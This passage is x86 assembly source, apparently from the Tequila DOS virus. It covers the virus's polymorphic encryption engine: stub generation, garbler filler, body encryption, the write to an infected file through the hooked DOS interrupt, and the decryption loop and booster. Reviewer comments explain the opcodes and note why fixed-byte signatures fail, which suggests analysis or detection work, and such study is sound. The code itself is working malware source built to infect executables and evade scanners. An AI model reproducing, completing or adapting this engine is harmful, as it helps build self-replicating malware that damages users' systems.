add ax,09a4
adc dx,0
div w[0d] ;masm mod. needed
inc ax
mov w[0a4d],ax ;masm mod. needed
mov w[0a4b],dx ;masm mod. needed
; image size split into segment (quotient) and offset (remainder).
mov dx,di
mov ax,si
div w[0b] ;masm mod. needed
mov w[0a5f],ax ;masm mod. needed
mov bx,dx
add dx,0960
mov w[0a5d],dx ;masm mod. needed
call copy_to_high_memory_encrypt_write
jb ret ;masm mod. needed
or w[09ae],01f ;masm mod. needed
mov bx,w[09bc]
and bx,01f
shl bx,1
mov ax,w[bx+0e8]
mov w[0a5b],ax ;masm mod. needed
call move_to_beginning_of_file
mov cx,01c
mov dx,0a49

write_the_new_header:
call 0696 ;masm mod. needed
out_of_encrypt:
ret

; prepares the per-file key area and start-up stub, then hands over to the
; code at offset 0a04h to transform and write the body.
; visible steps:
;   - int 1ah function 0 (tick count); the low word seeds both the fill
;     value and bp;
;   - 20h words at offset 0960h are filled with that value;
;   - es is set to 0, so the `es test b[bp]` reads in the step routines
;     fetch bytes from segment 0 at an address that depends on the tick
;     count;
;   - encrypt_step_one/two/three write a short instruction sequence at si
;     (starting at 0960h), chosen from alternatives by those bytes;
;   - a near jump (0e9h) to offset 028ch is appended after it.
; consequence for detection: the bytes at the entry point differ from file
; to file, so a fixed byte string taken from one sample's entry code should
; not be expected to match another.
; bp is preserved; carry on return comes from the called code.
copy_to_high_memory_encrypt_write:
push bp
xor ah,ah
int 01a
mov ax,dx
mov bp,dx
push ds
pop es
mov di,0960
mov si,di
mov cx,020
cld
rep stosw
xor dx,dx
mov es,dx
call encrypt_step_one
call encrypt_step_two
call encrypt_step_three
; 0e9h + 16-bit displacement = target - (address after the jump).
mov b[si],0e9
mov di,028c
sub di,si
sub di,3
inc si
mov w[si],di
mov ax,0a04
call ax
pop bp
ret

; first part of the generated start-up stub: writes one of two byte
; sequences at si, selected by bit 1 of a byte read from es:[bp].
;   0eh, 1fh         decode as push cs / pop ds
;   8ch,0cbh 8eh,0dbh decode as mov bx,cs / mov ds,bx
; either way the generated code ends up with ds = cs. garbler may insert
; filler between the pieces.
; in/out: si = write pointer (advanced), bp = selector pointer (decremented).
; NOTE(review): the jne target is an unlabelled absolute address,
; presumably the second variant below the first ret.
encrypt_step_one:
dec bp
es test b[bp],2 ;masm mod. needed
jne 08eb ;masm mod. needed
mov b[si],0e
inc si
call garbler
mov b[si],01f
inc si
call garbler
ret
mov w[si],0cb8c
inc si
inc si
call garbler
mov w[si],0db8e
inc si
inc si
call garbler
ret

; second part of the generated stub: the register loads.
; bit 0 of ch records which order was chosen, from bit 1 of a byte at
; es:[bp]. the emitted opcodes are 0beh (mov si,imm16), 0bbh
; (mov bx,imm16) and 0b9h (mov cx,imm16); the immediates are bx on entry,
; bx + 0960h, and the constant 0960h for cx.
; encrypt_step_three reads ch bit 0 to stay consistent with this choice.
; in/out: si = write pointer, bp = selector pointer, bx = offset value
; passed in by the caller (restored to its entry value on one path by the
; sub below).
; NOTE(review): jump targets are unlabelled absolute addresses, so the
; exact pairing of the two loads is a best reading.
encrypt_step_two:
and ch,0fe
dec bp
es test b[bp],2 ;masm mod. needed
je 0920 ;masm mod. needed
or ch,1
mov b[si],0be
inc si
mov w[si],bx
inc si
inc si
call garbler
add bx,0960
test ch,1
je 0934 ;masm mod. needed
mov b[si],0bb
inc si
mov w[si],bx
inc si
inc si
call garbler
add bx,0960
test ch,1
je 090c ;masm mod. needed
sub bx,0960
call garbler
mov b[si],0b9
inc si
mov ax,0960
mov w[si],ax
inc si
inc si
call garbler
call garbler
ret

; third part of the generated stub: the loop body.
; emitted, in order, with garbler filler in between:
;   - 8ah + modrm (a byte load), modrm 14h or 17h depending on ch bit 0;
;   - an arithmetic byte op whose opcode is dl: 00h, or 30h when bit 1 of
;     a byte at es:[bp] is set;
;   - 46h, 43h (inc si / inc bx);
;   - 81h 0feh/0fbh + imm16 (a compare of the key pointer with its start
;     plus 40h), then 72h (jb) over a reload of that pointer (0beh/0bbh);
;   - 0e2h (loop) with a displacement back to the first emitted byte (di).
; side effect: b[0a39] is set to 28h, or to 30h in the second case.
; NOTE(review): 0a39h appears to be the opcode byte of the `xor b[bx],dl`
; in the relocated copy of perform_encryption_decryption, which would make
; the write-side operation the inverse of the emitted one (28h = sub for
; 00h = add, 30h = xor for xor) - confirm the offset with a listing file.
; jump targets are unlabelled absolute addresses.
encrypt_step_three:
mov ah,014
mov dh,017
test ch,1
je 0958 ;masm mod. needed
xchg dh,ah
; di remembers where the loop body starts, for the backward displacement.
mov di,si
mov al,08a
mov w[si],ax
inc si
inc si
call garbler
xor dl,dl
mov b[0a39],028 ;masm mod. needed
dec bp
es test b[bp],2 ;masm mod. needed
je 0978 ;masm mod. needed
mov dl,030
mov b[0a39],dl ;masm mod. needed
mov w[si],dx
inc si
inc si
mov w[si],04346
inc si
inc si
call garbler
mov ax,0fe81
mov cl,0be
test ch,1
je 0993 ;masm mod. needed
mov ah,0fb
mov cl,0bb
mov w[si],ax
inc si
inc si
push bx
add bx,040
mov w[si],bx
inc si
inc si
pop bx
mov b[si],072
inc si
; dx = address of the jb displacement byte, filled in below once the
; length of what follows is known.
mov dx,si
inc si
call garbler
mov b[si],cl
inc si
mov w[si],bx
inc si
inc si
mov ax,si
sub ax,dx
dec ax
mov bx,dx
mov b[bx],al
call garbler
call garbler
mov b[si],0e2
inc si
sub di,si
dec di
mov ax,di
mov b[si],al
inc si
call garbler
ret
; filler generator used between the pieces of the generated stub.
; consumes one or more selector bytes from es:[bp] (bp is decremented
; before each read) and writes zero, one or two bytes at si:
;   nothing                 when the low four bits of the first byte are 0
;   0fch                    (decodes as cld)
;   90h                     (decodes as nop)
;   89h,0c7h                (decodes as mov di,ax)
;   84h/85h or 39h + modrm  (a test or cmp between registers; the modrm
;                           comes from a further selector byte with its
;                           top two bits forced to 11)
; NOTE(review): the choices look picked so they do not disturb the
; registers the stub relies on (si, bx, cx, dl) - confirm. jump targets
; are unlabelled absolute addresses and `ret` as a target is a86
; shorthand for a nearby ret.
; defender note: because this filler varies per file, instruction-level
; matching on the entry code has to tolerate inserted bytes from this set.
garbler:
dec bp
es test b[bp],0f ;masm mod. needed
je ret ;masm mod. needed
dec bp
es mov al,b[bp] ;masm mod. needed
test al,2
je 0a0e ;masm mod. needed
test al,4
je 09f7 ;masm mod. needed
test al,8
je 09f1 ;masm mod. needed
mov w[si],0c789
inc si
inc si
jmp ret ;masm mod. needed
mov b[si],090
inc si
jmp ret ;masm mod. needed
mov al,085
dec bp
es mov ah,b[bp] ;masm mod. needed
test ah,2
je 0a05 ;masm mod. needed
dec al
or ah,0c0
mov w[si],ax
inc si
inc si
jmp ret ;masm mod. needed
dec bp
es test b[bp],2 ;masm mod. needed
je 0a1a ;masm mod. needed
mov al,039
jmp 09f9 ;masm mod. needed
mov b[si],0fc
inc si
ret

; transforms the resident body in place, writes 09a4h bytes from offset 0
; to the file whose handle is in w[09a4] (function 40h through the saved
; int 21h vector), then transforms the body back so the resident copy
; keeps working.
; on a successful write ax = bytes written - 09a4h (zero when complete);
; the flags from that point are returned to the caller.
; NOTE(review): the compare of b[0a39] with 28h and the store of 0 look
; like a switch of the transform's opcode from sub (28h) to add (00h) for
; the reverse pass; an xor (30h) needs no switch. this depends on 0a39h
; being the opcode byte in perform_encryption_decryption - confirm. jump
; targets are unlabelled absolute addresses.
make_the_disk_write:
call perform_encryption_decryption
mov ah,040
mov bx,w[09a4]
mov dx,0
mov cx,09a4
pushf
call d[09b4] ;masm mod. needed
jb 0a37 ;masm mod. needed
sub ax,cx
pushf
cmp b[0a39],028 ;masm mod. needed
jne 0a44 ;masm mod. needed
mov b[0a39],0 ;masm mod. needed
call perform_encryption_decryption
popf
ret

; byte-wise transform of the first 0960h bytes of the segment (offsets
; 0 .. 095fh) with a repeating 40h-byte key held at offsets 0960h .. 099fh.
; as written the operation is xor, which is its own inverse.
; NOTE(review): other code writes to b[0a39], which may be the opcode byte
; of the `xor b[bx],dl` below once this routine is relocated - if so the
; operation actually performed varies at run time. confirm with a listing
; file. jump targets are unlabelled absolute addresses.
; clobbers bx, cx, dl, si and flags.
perform_encryption_decryption:
mov bx,0
mov si,0960
mov cx,0960
mov dl,b[si]
xor b[bx],dl
inc si
inc bx
; wrap the key pointer at the end of the 40h-byte key.
cmp si,09a0
jb 0a61 ;masm mod. needed
mov si,0960
loop 0a52 ;masm mod. needed
ret

; fixed-form example of the start-up loop: sets ds = cs, then adds a
; repeating 40h-byte key (offsets 0964h .. 09a3h) to 0960h bytes starting
; at offset 4, and jumps to offset 0390h.
; NOTE(review): the pointers are 4 higher than in
; perform_encryption_decryption (4 / 0964h against 0 / 0960h), which
; matches the booster's layout where the body's base is at 0104h rather
; than 0100h - confirm. 0390h is presumably `install`. in files written by
; the resident code the equivalent loop is generated by the
; encrypt_step_* routines and varies.
the_file_decrypting_routine:
push cs
pop ds
mov bx,4
mov si,0964
mov cx,0960
mov dl,b[si]
add b[bx],dl
inc si
inc bx
cmp si,09a4
jb 0a7e ;masm mod. needed
mov si,0964
loop 0a6f ;masm mod. needed
jmp 0390 ;masm mod. needed

;========== the following is not part of the virus ========


;========== but is merely the booster. ========

; booster (per the separator comment above, not part of the body). it fills
; in the values `install` expects to find for a host program: the offset of
; `exit` at 0104h and a relative segment of zero at 0106h (cs minus cs), so
; that the far jump at chain_to_the_host_file lands on `exit`.
start:
lea w[0104],exit ;masm mod. needed
mov w[0106],cs ;masm mod. needed
mov bx,cs
sub w[0106],bx ;masm mod. needed
jmp install

; int 20h: terminate program.
exit:
int 020

tequila endp
code_seg ends
end tequila
